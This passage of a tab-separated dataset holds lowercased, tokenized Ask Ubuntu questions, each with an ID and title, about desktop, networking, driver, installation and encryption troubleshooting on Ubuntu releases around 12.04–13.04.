0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 buttonrelease event , serial 41 , synthetic no , window 0x3a00001 , root 0x165 , subw 0x3a00002 time 398898 , ( 47,51 ) , root : ( 1154,251 ) , state 0x400 , button 3 , same_screen yes leavenotify event , serial 41 , synthetic no , window 0x3a00001 , root 0x165 , subw 0x0 , time 398898 , ( 47 , 51 ) , root : ( 1154,251 ) , mode notifyungrab , detail notifyinferior , same_screen yes , focus yes , state 0 for some reason the enternotify , keymapnotify and leavenotify events are n't fired when i 'm running ubuntu outside of a virtual machine . does anyone have any idea 's on why those events are n't fired ?
319385	prevent device from using static ip not assigned by dnsmasq 's dhcp server	i am trying to mimic the functionality of clearos , a red hat based gateway/content filter . i 'm using ubuntu 13.04 desktop on a pc with two nics . so i have installed dansguardian and squid and i also installed the full dnsmasq package so i can use it as a dhcp server . these are the same packages clearos uses . my setup is working well except for one issue . in dnsmasq.conf , i statically assigned 192.168.1.4 to the mac address of my pc . i do this because i configured the proxy/content filter to allow mypc to bypass the filter , based on its ip address . however , i turned off mypc and went to another pc ( call it kidspc ) and manually configured kidspc with the same address ( 192.168.1.4 ) . oops , kidspc can bypass the proxy/content filter . with clearos , when i did the above , the gateway would not allow traffic from kidspc to the internet . it somehow detected that i 've already statically assigned this address to another device 's mac . is it possible to mimic the clearos behavior ? is there a setting i 'm missing ? the forums at clearos do n't seem eager to help me . i 've googled and ca n't find an answer . thanks for your help .
319386	black screen after trying to fix password	i went to fix the password and the entire screen took me to a bios type of black screen . when i 'm stuck there it asks for a password , but it will not allow me to type anything . i tried pressing f1 , f2 , f8 , f9 , f10 and f12 but nothing happened . i 'm still stuck with the same black screen . how do i fix this ?
319389	where to find the latest kubuntu ( 13.04 ) with autoinstaller ?	i 've just now learnt that kubuntu 13.04 does n't provide auto installer for dual boot system . ubuntu provides . lubuntu provides , xubuntu provides . kubuntu force you to install manually . do partition , install and set grub , etc . so painful surprise . only two alternatives , either it takes 100 % of disk or do it yourself . i downloaded the .iso file from their site . so , that version is a `` do-it-yourself '' version . where may i find a version with auto installer , as in ubuntu , xubuntu and lubuntu ?
319390	display issue on toshiba satellite p75-a7200	i am fairly new to linux and ubuntu and i am sure this is a simple issue . the screen is really dark on the boot up and it looks like it is off . i 've found out that if i plug a monitor and boot , i can see what is going on . if i unplug the extra monitor then the screen resizes and works perfectly fine . i thought that it might be a driver issue so i downloaded the intel linux graphics driver program . that seemed to take care of some of the other issues but not the display issue . if i reboot i have to plug a monitor and go through the same process . i was wondering if anybody had a fix for me ? i have been surfing the web trying to find solutions , but to no avail .
319394	problem during qt 5.1 installation	i downloaded the qt 5.1.0 installation file for linux , and trying to install gives me an error . it stops when copying these files : /opt/qt5.1.0/5.1.0/src/qtbase/tests/benchmarks/gui/image/qimagereader/images/font.bmp /opt/qt5.1.0/5.1.0/src/qtbase/tests/auto/gui/image/qimagereader/images/font.bmp /opt/qt5.1.0/5.1.0/src/qtbase/tests/auto/gui/image/qimagewriter/images/font.bmp /opt/qt5.1.0/5.1.0/src/qtbase/tests/auto/gui/image/qimage/images/image.bmp then it complains it ca n't find some other files , and the installation is aborted . installing in my home directory seemed to work fine though . what could be the problem ?
319400	how to run .sh script with keybind	i have small script that makes screenshot of selected area and then updates it on imgur function uploadimage { curl -s -f `` image= @ $ 1 '' -f `` key=486690f872c678126a2c09a9e196ce1b '' https : //imgur.com/api/upload.xml | grep -e -o `` < original_image > ( . ) * < /original_image > '' grep -e -o `` http : //i.imgur.com/ [ ^ < ] * '' } notify-send `` select screenshot area '' filename= $ ( date + '' % d- % m- % y_ % t '' ) '' .png '' scrot -s $ filename uploadimage $ filename | xclip -selection c notify-send `` screenshot $ filename uploaded . link copied to clipboard . '' i placed it in $ home/screenshots/ directory . everything works fine when i run it from terminal ./screenshot.sh but when i try to bind it to key using default xfce keybinder with command bash /path/to/file/screenshot.sh then it does n't work . after pressing selected key , i get first norification , and second just moment after . it does n't make any screenshot , it does n't even wait for selection . how can i fix it ?
319405	ubuntu installer does not see all the logical partitions	i 'm trying to install ubuntu on my computer . i have several logical partitions , but the ubuntu installer shows me only 4 primary partitions . when i run the ubuntu live cd i have access to all of the logical partitions . how do i fix it ?
319407	trying to export xinput information for remote display in 12.04	i am trying to run xinput -- list on a remote machine . it seems to work ok on our 10.04 machines but our 12.04 machines do n't seem to want to play ball . basically i use a putty session to connect to the remote machine , in 10.04 i can then run export display=:0 and then , depending on the requirements run xinput -- list and/or xinput_calibrator . this will either list the input devices , or run the calibrator on the remote screen and output the results to the putty session . the error i am getting is : no protocol specified no protocol specified unable to connect to x server are there any common configuration changes i would need to make this work ? why would it work in 10.04 but not 12.04 ?
319412	how to secure system users which only runs application processes ?	i created a system user through adduser command for use in an application i installed . this user is supposed to run application-specific processes and such ( think of postgres system user doing nothing but running postgres related stuff ) because this user does n't do anything except do the application 's bidding , is there a way to prevent a human from logging in with this user ? this user is n't part of any groups ( so i do n't have to worry about ssh logins or other group perms ) . i have read that not having a home folder will help prevent logins , but i needed a home folder for this user because that 's where i compiled/installed the application . aside from preventing a human from logging in to this user account , is there other security considerations to consider ?
319414	sshâca n't reach iphone root folder	when using nautilus connect to server to connect with an iphone over ssh , it takes me to a location that just has the media and library folders . their location is sftp : //192.168.x.x/private/var/root/ how do you get to the /var or /private folders ? nautilus just shows the ( 192.168.x.x ) button that takes you to sftp : //192.168.x.x/private/var/root/ .
319415	how can i burn the 12.04.2-desktop iso-image under windows xp ?	trying to burn this to dvd using the recommended infra recorder for win xp , however the instructions ( http : //www.ubuntu.com/download/desktop/burn-a-dvd-on-windows ) reflect `` select the ubuntu cd image file you want to use , then click 'open '' the `` ok '' button on the infra recorder remains grey did i correctly understand the infra recorder will convert a zip to an iso ? many thanks dbt
319418	can not change brightness	i 'm using ubuntu 13.04 and my graphics card is nvidia gf 620m . for some reason , ubuntu is using the ivy bridge processor . it works fine , though . the only issue i 'm facing is the brightness . i ca n't change it . i 'm trying to change it through the hot keys in my acer , but it is not changing . anyway to do that ?
319419	ubuntu 13.04 does not work after windows8 update	i am using ubuntu 13.04 on my w-530 laptop . the laptop came with a pre-installed version of windows 8 . i somehow managed to install ubuntu 13.04 on it and it was working very well . but , i needed to work on windows as well , so i used the boot repair to start windows 8 . it successfully worked . here is report - http : //paste.ubuntu.com/5868906/ when i logged on to windows8 , it made a update and there after on restart it did not show the grub . i used boot-repair again but it does not work . i am unable to see grub and hence log into ubuntu . here is the report generated from boot-repair - http : //paste.ubuntu.com/5869002/ your help will be much appreciated .
319421	where to set environment variables for all users	apologies in advance if this question is very simplistic ! i have ubuntu 12.04 . i manually installed maven by downloading the binary tarball file and extracting it to the /opt/ folder . i then set the relevant export variables with the following commands : export m2_home=/opt/apache-maven-3.0.5 export path= $ path : $ m2_home/bin for good measure , i added these into the /home/andrew/.bashrc file ( with andrew being the main user profile ) . however , i later realised that obviously this only set the path variables for that particular user . when i change to a secondary user , they do n't detect the maven installation as they do n't have the export variables . how do i set global variables to govern something like this ?
319423	why ca n't i use my @ ubuntu.com mail address to register an ubuntu one account ?	when i try to do so , it tells me : this email address can not be used .
319427	dual-booting chrome os and ubuntu 13.04 on a pc	is it possible to install chrome os and ubuntu 13.04 on a x86 system ( core 2 duo ) ?
319429	chromium web apps will not install after i am prompted . unity extension is installed	chromium web apps will not install even after i am prompted . the unity extension is installed . this is a fresh ubuntu 13.04 64 bit install and the system was updated directly after the installation . is anyone else having this problem with chromium ? how can i fix this ?
319433	making mirror : //mirrors.ubuntu.com highly available	we 're a distributed team , which is why our vms use the ubuntu mirror : // setup . our /etc/apt/sources.list looks like the following : deb mirror : //mirrors.ubuntu.com/mirrors.txt lucid main restricted universe multiverse deb mirror : //mirrors.ubuntu.com/mirrors.txt lucid-updates main restricted universe multiverse deb mirror : //mirrors.ubuntu.com/mirrors.txt lucid-backports main restricted universe multiverse deb mirror : //mirrors.ubuntu.com/mirrors.txt lucid-security main restricted universe multiverse this by itself is pretty amazing and very helpful for people who work in different locations ââ less local customization , etc . necessary . fail-over in theory . in day-to-day , this setup fails too often . i want to say 2-3 times this week . right now mirrors.ubuntu.com returns ftp.uni-bayreuth.de as my closet mirror . unfortunately , it seems to be down . this has been going on for a few hours and the mirror is hosted by volunteers at a university and today being a friday , my hopes are low that this is getting corrected soon . all talk , my questions are : does anyone use this ? how do you work around downtime ? ( my quick-fix is a shell script ) how can i help to improve this situation ?
319447	second wifi card stopped all wifi	i have broadcom bcm4313 internal wireless . i have also ralink rt2870/3070 usb wireless adapter . this is normal connections menu . i also plugged ralink usb wireless in my computer . this is after plugged usb wireless in . and now broadcom and ralink doesnt work . osman @ inspiron-n4030 : ~ $ rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no 2 : hci0 : bluetooth soft blocked : no hard blocked : no 4 : phy2 : wireless lan soft blocked : no hard blocked : yes osman @ inspiron-n4030 : ~ $ i tried sudo rfkill unblock all but didnt worked . can someone help me ?
319450	macbook isight not working	i 've tried to get my isight camera working but for some reason do n't know what 's wrong . i 've followed the instructions on both : https : //help.ubuntu.com/community/mactelsupportteam/appleisight and http : //turanct.wordpress.com/2010/06/11/use-your-macs-isight-on-ubuntu/ # comments the problem is after i type in terminal sudo apt-get install isight-firmware-tools i go through as the instructions say but when i put in the appleusbvideosupport file path it says that there is no file located at that path ? not sure what to do now . any help is greatly appreciated thanks . edit : here 's the technical specs of the macbook . 1.83 ghz macbook ( ma254ll/a ) processor 1.83ghz intel core duo l2 cache 2mb system bus 667mhz memory 2gb of 667mhz ddr2 sdram ( pc2-5300 ) on two so-dimms hard drive 160 gb intel solid state drive 320 series ( ssd sa2bw160g3h ) 2.5 '' , 3gb/s sata ssd160gb 5v 1a optical drive slot-loading combo drive ( dvd-rom/cd-rw ) graphics intel gma 950 graphics processor with 64mb of ddr2 sdram shared with main memory1 video camera built-in isight display 13.3-inch ( diagonal ) glossy tft widescreen display , 1280 x 800 resolution ports one firewire 400 port ( 8 watts ) ; two usb 2.0 ports ( up to 480 mbps ) ; mini-dvi port with support for dvi , vga , s-video and composite video output ( requires adapters , sold separately ) 4 audio built-in stereo speakers , built-in omnidirectional microphone , combined optical digital audio input/audio line in , combined optical digital audio output/headphone out networking built-in 10/100/1000base-t ( gigabit ) wireless3 built-in 54-mbps airport extreme wireless networking ( 802.11g standard )
319452	rhythmbox 2.96 keeps crashing	rhythmbox has been crashing a lot lately . i get three different kinds of messages before everything dies in a horrible segmentation fault . the first , which is most common : ( rhythmbox:6475 ) : glib-gobject-critical ** : g_value_get_uint : assertion `g_value_holds_uint ( value ) ' failed segmentation fault ( core dumped ) the second , which is less common : ( rhythmbox:6823 ) : glib-critical ** : g_variant_unref : assertion `value- > ref_count > 0 ' failed ( rhythmbox:6823 ) : glib-gobject-critical ** : g_value_get_uint : assertion `g_value_holds_uint ( value ) ' failed segmentation fault ( core dumped ) the third , which i saw for the first time just a moment ago : ( rhythmbox:6883 ) : glib-gobject-critical ** : g_value_get_uint : assertion `g_value_holds_uint ( value ) ' failed segmentation fault ( core dumped ) the first message 's assertion ( line 6475 ) may or may not print several times without crashing the program . there is no predictable pattern as to when these errors will occur . sometimes they 'll occur within 10 seconds of starting the program ; other times it will run flawlessly for half an hour . sometimes it is caused by rhythmbox freezing . i tried suggestions found in this post as well as this post but to no avail . i also tried reinstalling rhythmbox after fully uninstalling and purging the packages from my system . this did not resolve the issue either . does anyone know how to resolve this ?
319454	unable to activate wireless card on vostro 3360 running 13.04	i have a new install of 13.04 and have been working for three days to get the wireless working . i have tried at least 20 different methods to fix the issue and i have had no luck . my ethernet works fine after a wireless-bcm43142-dkms_6.20.55.19-2_amd64.deb install , but it does not fix my wireless issue . does anyone have any ideas or experience to share with me ?
319455	skype wo n't work	this is what i get when trying to install it : drsloth @ drsloth : ~ $ sudo apt-get install libasound2 : i386 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libasound2 : i386 : depends : libc6 : i386 ( > = 2.7 ) but it is not going to be installed libatk-wrapper-java : depends : default-jre but it is not going to be installed or java2-runtime recommends : libatk-wrapper-java-jni but it is not going to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages .
319464	i downloaded an epub file , how can i get it from ubuntu to my ipad ?	i am travelling tomorrow and i have some pdf 's and e-books i want to read on my ipad . i have downloaded an epub file to my ubuntu computer . i want to know how to sync files in ubuntu with an ipad or how i could store files on the ipad from ubuntu . i tried using ubuntu one but it just gives me the option of `` open in ibooks '' which does not appear to be working .
319470	netflix desktop and wine	is there a way to reliably install netflix desktop and the full version of wine ? i want to be able to use netflix , but also have a full-functioning wine install . how would be the best way to do this ? thanks ! edit : it seems that they are actually fully compatible now . i posted an answer with more details .
319481	partition splitting during installation	i already have a ext4 partition on my hard drive . during ubuntu 's installation the setup shows me an option to split a partition . apparently i am being forced to define a new partition , but i just want it to install ubuntu in my already existing ext4 partition . how do i do this ? edit : i 've taken a picture of my advanced installation screen . sda1 is where my windows installation is , sda5 and sda6 are the linux partitions i already have . sda7 is my data partition . i 'd like to install ubuntu in sda6 , without messing up my windows installation or the data in sda7 . what do i have to do ?
319482	ubuntu 13.04 amd64 ati hd 5850 is n't found ( instead just the intel gpu )	i have an acer aspire 7745g laptop . the freshly installed ubuntu shows in the settings that the intel ironlake mobile is found , but not the ati . when i go into the bios and switch the graphics mode to discrete , the screen gets all grainy ( during the boot up already ) , and ubuntu still just finds the intel chip . i tried to install graphics drivers from ati but without success , maybe i did something wrong ? installing the proprietary ati drivers does n't seem to work , as the software does n't find the device as expected . when i had windows i had the same problem : the normal ati drivers did n't work , but the one acer provided did . apologies if there 's already a question like this , but all the other questions related to my problem were n't specific enough . sometimes i followed instructions which caused ubuntu to crash while booting , so i 'm cautious with any random advice not related to my specific problem . i 'm relatively new to linux , but i definitely want to stay there . i hope this is enough information for you to work with , and i 'd be very grateful for any advice .
319483	jerky mouse control while running .jnlp file	i am having problems whenever i try to run a .jnlp file . i am having no problems launching the game , but once in it , the mouse control is very jerky and trying to use it is very frustrating . i have tried opening these java files in java 6 and java 7 with the same results . i do n't have any mouse control issues in any other applications . any help would be great . i am running ubuntu 12.04 lts .
319486	grub rescue ca n't write outside of disk `` hd0 ''	i tried to install ubuntu 13.04 from a live usb , and it said it was successfully installed , and after the reboot i got an error message that said : error : attempt to read or write outside of disk `` hd0 '' grub rescue i am new to ubuntu . please help .
319487	ubuntu 13.04 from usb	i would like to change the desktop from what it is to the old look . i do n't like the new look . hope it can it be done on the usb ?
319492	how to use slirp to build packages without sudo ?	a comment to the answer of the question : is it possible to run pbuilder without root privileges ? says this , if slirp works out of the box and doesnât require root ( for writing to /etc and adding your user to a group ) to set up , why would anyone not use slirp for this ? does the commenter mean to use slirp to install and manage packages ? how do i use slirp for this ? i tried google , but could not find useful information . i can not add comment so i asked new question .
319493	debugging html5 with ubuntu sdk	i read this question : can i develop a hybrid native/html5 app for the ubuntu phone ? and it has a great answer , but that is no longer supported in the ubuntu sdk ( ubuntu 13.04 ) , now it uses : import qtquick 2.0 import ubuntu.components 0.1 import qtwebkit 3.0 and there are some errors when trying to call the `` settings '' of webview : can not assign to non-existent property `` settings '' digging in the web i found some solution , sadly does n't work for me . import qtquick 2.0 import ubuntu.components 0.1 import qtwebkit 3.0 import qtwebkit.experimental 1.0 mainview { // objectname for functional testing purposes ( autopilot-qt5 ) objectname : `` mainview '' // note ! applicationname needs to match the .desktop filename applicationname : `` gastos '' width : units.gu ( 100 ) height : units.gu ( 75 ) page { id : page title : `` html5 app '' flickable { id : webviewflickable anchors.fill : parent webview { experimental.preferences.developerextrasenabled : true experimental.preferences.javascriptenabled : true id : webview anchors.fill : parent url : `` html/index.html '' ontitlechanged : { page.title = title ; } } } } } some warnings are shown but it starts well . warning : this project is using the experimental qml api extensions for qtwebkit and is therefore tied to a specific qtwebkit release . warning : the experimental api will change from version to version , or even be removed . you have been warned ! no developer tools though . right click does n't work , perhaps i 'm missing something ? any help will be greatly appreciated . thanks in advance
319497	trying to install ubuntu 13.04 alongside windows 7	i installed ubuntu 13.04 alongside the existing windows 7 os . the ubuntu installation completed successfully , and it asked me to restart my computer . when i restarted , it was just windows 7 that loaded as usual , but ubuntu was n't there . can anyone tell me what 's wrong ?
319500	does minitube have automatic playlist ?	i 'm using minitube 2.1 , and i was under the impression that it has it had an automatic playlist . do you have to enable that feature or what ?
319505	how to transfer bookmarks from windows to ubuntu !	i just installed 10.4.3 inside windows vista how can i transfer my bookmarks from foxfire on vista to foxfire on 10.4.3 ? or is it not possible ?
319512	mount exfat drive on ubuntu 13.04 not as root	i realised that ubuntu 13.04 automatically mounts my internal drives which are some exfats automatically when i try to open them . thats good . however , it is mounted as `` root '' and i want to mount it as my current user . is there any way to make it mount not as root through some configurations or do i have to do it as a command ? thanks
319520	avoid duplicate pids while grepping for a pattern	i have written a shell script that reads the updating logs and sends an email notification when there are oom using do while loop . i am able to get the email notification for oom errors but every time a duplicate pid is getting generated for the email sent which is creating a huge no . of duplicate pids while i am grepping for that particular process/ admin server ( weblogic ) . pfb my script , is there any way i can avoid the duplicate pids and can get only parent pid while doing a grep . # ! /bin/sh # script to read the updating log file and send mail for any errors : logcheck.sh # set variables logfile=bea_home/servers/admin.log pattern= '' java.lang.outofmemoryerror : java heap space '' # read each line as it gets updating to the log file tail -fn0 $ logfile | while read line ; do # check each line for our pattern echo `` $ line '' | grep -i `` $ pattern '' # perform the below action if a line matches with our pattern if [ $ ? = 0 ] ; then # send an email echo `` found an error : $ line '' | mailx -s `` please check the error '' emailid fi done
319521	strange audio sound of thunder starts over after my laptop starts in ubuntu 12.04	strange audio sound of thunder starts over after my laptop starts.unable to know what is playing this sound . please help .
319522	ubuntu on aakash	i have an aakash 2 ( ubislate 7ci ) tablet . it runs on android 4.0 ics . i want to make it run on ubuntu . give me the procedures involved .
319525	ubuntu server : extra drivers during install	is there a way when installing ubuntu server ( 13.04 ) to activate linux-image-extra . my lan card has his driver in that extra package and as is it not used at install , the installer ca n't see my card . ( for information my driver is jme ) thanks
319528	how to see the details which ubuntu shows at the time of login anytime ?	when i login to my ubuntu system , it show me this this message , how can i see it any time ? i tried to run . .bashrc but it did n't worked . welcome to ubuntu 12.10 lts ( gnu/linux 3.2.0-24-virtual x86_64 ) * documentation : https : //help.ubuntu.com/ system information as of sat jul 13 06:16:35 utc 2013 system load : 0.55 processes : 96 usage of / : 8.1 % of 68.74gb users logged in : 0 memory usage : 55 % ip address for eth0 : 198.xx.xxx.xxx swap usage : 0 % ip address for eth1 : xxx.1x0.xx.xxx = > there is 1 zombie process . graph this data and manage this system at https : //landscape.canonical.com/ 223 packages can be updated . 134 updates are security updates . last login : mon jul 8 17:47:05 2013
319529	php5 ubuntu not updated ?	i just installed php5 on my newly setup ubuntu server 12.04 . however , i noticed why does the php version is kind of too low ? as compared to the official php.net website , the recent version is at php 5.4.17 or php 5.3.27 . is there anything i am missing ? php 5.3.10-1ubuntu3.6 with suhosin-patch ( cli ) ( built : mar 11 2013 14:31:48 ) copyright ( c ) 1997-2012 the php group zend engine v2.3.0 , copyright ( c ) 1998-2012 zend technologies
319534	how do i get webcam to work on my lg x120 in lubuntu 13.04 ?	first time noob so dont be hard on me : ) i recently installed lubuntu 13.04 on an old lg x120 netbook , everything works fine except the webcam . tested it in skype , google hangouts and cheese . the first two indicate that there is no camera connected and the third just show black square . i 've googled the problem for a few hours and tried various solutions without success ... at first i found this page- that states that the lg x120 webcam `` works perfectly in skype/cheese/ffmpeg - uses uvcvideo driver '' . and then i tried unsuccessfully to find a way to install/activate this `` uvcvideo '' driver . and then i came across this page - states that after installing lubuntu on the x120 `` almost everything works just fine right after the installation ( webcam , wifi , touchpad , 3g adaptor ... ) '' am i doing something wrong ? btw , the camera worked just fine on windows 7 with the proper driver installed ... lsusb shows : bus 003 device 002 : id 17ef:6019 lenovo bus 005 device 002 : id 18e8:6252 qcom bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub have no idea what is means ... : (
319535	can changing desktops environments affect my programs/personal data ?	if i install a different desktop environment on ubuntu , will it delete files or programs installed earlier ? could i use those programs installed with ubuntu if i replace the environment with xfce ?
319543	hp psc1410 printer is not printing , status is stating filter failed	i have upgraded to ubuntu 13.04 and the hp psc1410 printer is not printing and the status in the printer error log is stating `` filter failed '' and nothing is printing .
319544	changing keyboard layout on a thai-laptop - into german	i would like to get rid of win8 and install ubuntu on my new laptop . there is one question i have regarding the keyboard . i bought this laptop in thailand and the keyboard is thai/american . for me it is necessary to change the keyboard layout into german layout and switch between thai and german . is this possible with ubuntu ? thanks a lot ... elke
319547	some icons missing in nautilus	i 've noticed that many icons are missing in my folder view , but have no idea when or how this happened . here 's the screenshot : the icons that are missing are those from the sidebar and navigation bar , they are shown as a red missing sign on black background . any ideas how this happened and how to fix it ?
319550	change the color of the terminal	guys when i log in to shell prompt i want to change the text colors to green if its that possible ? i do not have any idea about doing it .
319551	installing linux without affecting window 7	i have window 7 installed on my laptop and i can install linux ( ubuntu ) . i just wanted to install it with the following conditions : at the time of booting i get option for both os , but if i delete linux os it should not affect the booting process of windows . may be it automatically gain windows bootloader or if its grub , its ok . i am not aware of what is `` sda '' at the time of installation . can i create `` sdb '' without destroying windows partitions and install linux in this `` sdb '' ? i got free space in my system .
319552	how to change tor to run by a different user ?	i downloaded the tor browser and i downloaded the tor bundle but when i click on the tor browser i get this /home/username/.tor-browser/data/tor is not owned by this user ( username , 1000 ) but by root ( 0 ) . perhaps you are running tor as the wrong user ? failed to parse/validate config : could n't access/create private data directory `` home/username/.tor-browser/data/tor '' when i double click on the `` start-tor-browser '' it only opens the file . so that is why i downloaded the browser . i 'm not sure how to change the name to my username so i can use tor .
319556	ubuntu error/bug in which all dns records have the same strange ip class	first off all , i want to say that i 'm not new to ubuntu , and i primarily use it as a gateway server . i have ubuntu 12.04 lts server without a gui . these days after a big storm , i had a power outage . when the power came back , everything was ok , until i spotted the problem . root @ ubuntu : ~ # uname -a linux ubuntu 3.2.0-49-generic-pae # 75-ubuntu smp tue jun 18 18:00:21 utc 2013 i686 i686 i386 gnu/linux this is the problem : root @ ubuntu : ~ # nslookup google.com server : 192.168.1.254 address : 192.168.1.254 # 53 name : google.com address : 198.18.1.13 root @ ubuntu : ~ # nslookup yahoo.com server : 192.168.1.254 address : 192.168.1.254 # 53 name : yahoo.com address : 198.18.1.14 root @ ubuntu : ~ # nslookup ubuntu.com server : 192.168.1.254 address : 192.168.1.254 # 53 name : ubuntu.com address : 198.18.1.24 the problem is that even the php functions file_get_contents or gethostbyname are not working , and they give me the same ip class on query . other effects : root @ ubuntu : ~ # ping google.com ping google.com ( 198.18.1.13 ) 56 ( 84 ) bytes of data . ^c -- - google.com ping statistics -- - 23 packets transmitted , 0 received , 100 % packet loss , time 22173ms root @ ubuntu : ~ # apt-get update 0 % [ connecting to it.archive.ubuntu.com ( 198.18.1.19 ) ] [ connecting to security.ubuntu.com ( 198.18.1.18 ) ] [ connecting to archive.canonical.com ( 198.18.1.17 ) ] [ connecting to ppa.launchpad.net ( 198.18.1.16 ... ... w : failed to fetch http : //it.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/i18n/translation-en unable to connect to it.archive.ubuntu.com : http : e : some index files failed to download . they have been ignored , or old ones used instead . my network configuration is like this : internet -- adsl router -- ubuntu gw -- switch lan/wifi -- computers adsl router has a pppoe connection with the provider and it has the ip 192.168.1.254 ubuntu has the following output from running ifconfig and route -n : root @ ubuntu : ~ # ifconfig eth0 link encap : ethernet hwaddr 00:10 : b5 : f9 : d4:76 inet addr:192.168.1.2 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :210 : b5ff : fef9 : d476/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:540782 errors:0 dropped:0 overruns:0 frame:0 tx packets:327646 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:731616835 ( 731.6 mb ) tx bytes:26098933 ( 26.0 mb ) interrupt:17 base address:0x3000** eth1 link encap : ethernet hwaddr 00 : e0:4c:3a:5d : a2 inet addr:192.168.0.3 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :2e0:4cff : fe3a:5da2/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:313887 errors:0 dropped:0 overruns:0 frame:0 tx packets:526813 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:25127774 ( 25.1 mb ) tx bytes:730199162 ( 730.1 mb ) interrupt:18 base address:0x3400** lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:728 errors:0 dropped:0 overruns:0 frame:0 tx packets:728 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:41363 ( 41.3 kb ) tx bytes:41363 ( 41.3 kb ) root @ ubuntu : ~ # route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.254 0.0.0.0 ug 100 0 0 eth0 192.168.0.0 0.0.0.0 255.255.255.0 u 0 0 0 eth1 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 needless to say that in my lan all is going well , for example : c : \users\leon > ping google.com pinging google.com [ 74.125.232.136 ] with 32 bytes of data : reply from 74.125.232.136 : bytes=32 time=27ms ttl=53 reply from 74.125.232.136 : bytes=32 time=25ms ttl=53 reply from 74.125.232.136 : bytes=32 time=28ms ttl=53 reply from 74.125.232.136 : bytes=32 time=24ms ttl=53 ping statistics for 74.125.232.136 : packets : sent = 4 , received = 4 , lost = 0 ( 0 % loss ) , approximate round trip times in milli-seconds : minimum = 24ms , maximum = 28ms , average = 26ms so this is the problem . it may be from the last update taken 2-3 days back , and i spotted the problem only after the power outage , or it may be from the power outage , even though i doubt it , because with ext4 and jbd2 i feel somewhat protected against data loss . thank you for your answers . i will try to post asap if you have any more questions .
319561	change the passphrase of an ecryptfs directory	i want to have an encrypted directory ( not homedir ! ) let 's say /testdata . i have used the following command and parameters to encrypt it : root @ pc : ~ # mount -t ecryptfs /testdata/ /testdata/ passphrase : select cipher : 1 ) aes : blocksize = 16 ; min keysize = 16 ; max keysize = 32 2 ) blowfish : blocksize = 8 ; min keysize = 16 ; max keysize = 56 3 ) des3_ede : blocksize = 8 ; min keysize = 24 ; max keysize = 24 4 ) twofish : blocksize = 16 ; min keysize = 16 ; max keysize = 32 5 ) cast6 : blocksize = 16 ; min keysize = 16 ; max keysize = 32 6 ) cast5 : blocksize = 8 ; min keysize = 5 ; max keysize = 16 selection [ aes ] : select key bytes : 1 ) 16 2 ) 32 3 ) 24 selection [ 16 ] : enable plaintext passthrough ( y/n ) [ n ] : enable filename encryption ( y/n ) [ n ] : y filename encryption key ( fnek ) signature [ b9fc92f854a4c85b ] : attempting to mount with the following options : ecryptfs_unlink_sigs ecryptfs_fnek_sig=b9fc92f854a4c85b ecryptfs_key_bytes=16 ecryptfs_cipher=aes ecryptfs_sig=b9fc92f854a4c85b warning : based on the contents of [ /root/.ecryptfs/sig-cache.txt ] , it looks like you have never mounted with this key before . this could mean that you have typed your passphrase wrong . would you like to proceed with the mount ( yes/no ) ? : yes would you like to append sig [ b9fc92f854a4c85b ] to [ /root/.ecryptfs/sig-cache.txt ] in order to avoid this warning in the future ( yes/no ) ? : yes successfully appended new sig to user sig cache file mounted ecryptfs this command creates this file : root @ pc : ~ # cat .ecryptfs/sig-cache.txt b9fc92f854a4c85b now i want to change the passphrase i used before . i found the ecryptfs-rewrap-passphrase command but i am not sure if i am on the right path : root @ pc : ~ # ecryptfs-rewrap-passphrase .ecryptfs/sig-cache.txt old wrapping passphrase : new wrapping passphrase : new wrapping passphrase ( again ) : error : unwrapping passphrase failed [ -5 ] info : check the system log for more information from libecryptfs /var/log/syslog says : jul 13 13:16:19 pc ecryptfs-rewrap-passphrase : ecryptfs_unwrap_passphrase : pk11_cipherop ( ) error ; secfailure = [ -1 ] ; port_geterror ( ) = [ -8188 ] i have a newbie status in regards to ecryptfs and i would appreciate some enlightenment here .
319566	no sound or networking	so yesterday i broke my sudo when i changed the permissions of the /usr folder . but late into the night i was able to restore it . now my sound and networking do not work . videos also do not play because the sound does n't work . it also does n't show me the battery meter . apt-get -f install , dpkg -- configure -a , and , sudo apt-get update & & sudo apt-get install upgrade do n't help , the last one because there is n't any internet connection . please help me . thanks in advance .
